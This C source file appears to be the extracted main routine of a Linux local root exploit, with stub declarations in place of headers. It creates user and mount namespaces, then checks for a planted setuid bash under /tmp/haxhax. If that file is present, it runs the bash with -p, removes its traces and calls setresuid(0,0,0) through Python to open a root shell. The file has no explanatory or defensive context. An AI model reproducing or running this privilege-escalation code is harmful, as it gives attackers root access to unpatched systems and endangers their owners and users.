
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {int st_mode; } ;
typedef scalar_t__ pid_t ;


 int CLONE_NEWNS ;
 int CLONE_NEWUSER ;
 int SIGCHLD ;
 int child_exec ;
 scalar_t__ child_stack ;
 scalar_t__ clone (int ,scalar_t__,int,int *) ;
 int execl (char*,char*,char*,char*,char*,int *) ;
 int exit (int) ;
 scalar_t__ fork () ;
 int fprintf (int ,char*) ;
 int stat (char*,struct stat*) ;
 int stderr ;
 scalar_t__ unshare (int ) ;
 int usleep (int) ;
 int wait (int *) ;
 int waitpid (scalar_t__,int*,int ) ;

int
main(int argc, char **argv)
{
    int status;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    struct stat s;

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, ((void*)0));
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(((void*)0));

    stat("/tmp/haxhax/u/bash",&s);

    if(s.st_mode == 0x89ed)
        execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",((void*)0));

    fprintf(stderr,"couldn't create suid :(\n");
    return -1;
}
